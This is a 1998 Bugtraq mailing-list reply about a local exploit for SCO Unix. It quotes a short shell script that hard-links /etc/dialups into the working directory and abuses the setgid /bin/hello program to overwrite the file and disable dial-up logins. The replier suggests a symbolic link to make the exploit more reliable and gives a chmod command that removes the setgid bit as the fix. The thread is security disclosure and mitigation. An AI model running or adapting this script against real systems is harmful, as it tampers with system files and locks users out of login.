[7934] in bugtraq
Re: Fw: Exploit for SCO.
daemon@ATHENA.MIT.EDU (John W. Temples)
Fri Sep 11 19:35:38 1998
Date: Fri, 11 Sep 1998 16:20:48 -0700
Reply-To: john@whitefang.com
From: "John W. Temples" <john@KUWAIT.NET>
X-To: Leshka <leshka@LESHKA.CHUVASHIA.SU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <003e01bddce2$881d8ec0$ded43ac2@IPIGN>
On Thu, 10 Sep 1998, Leshka wrote:
> tty=`tty`;ttyfile=`pwd`/`basename $tty`
> echo "Press any letter key 240 times (3 lines of text) then <CTRL>-D to
> disable"
> echo "login or just type <CTRL>-D to login enable. Sorry for the manual
> work."
> ln /etc/dialups $ttyfile;hello leshka ..$ttyfile;rm -f $ttyfile
The exploit fails if your CWD is not in the same file system as /etc.
Using a symbolic rather than a hard link fixes that.
The exploit can be defeated with:
# chmod g-s /bin/hello
--
John W. Temples, III || Providing the first public access Internet
Gulfnet Kuwait || site in the Arabian Gulf region
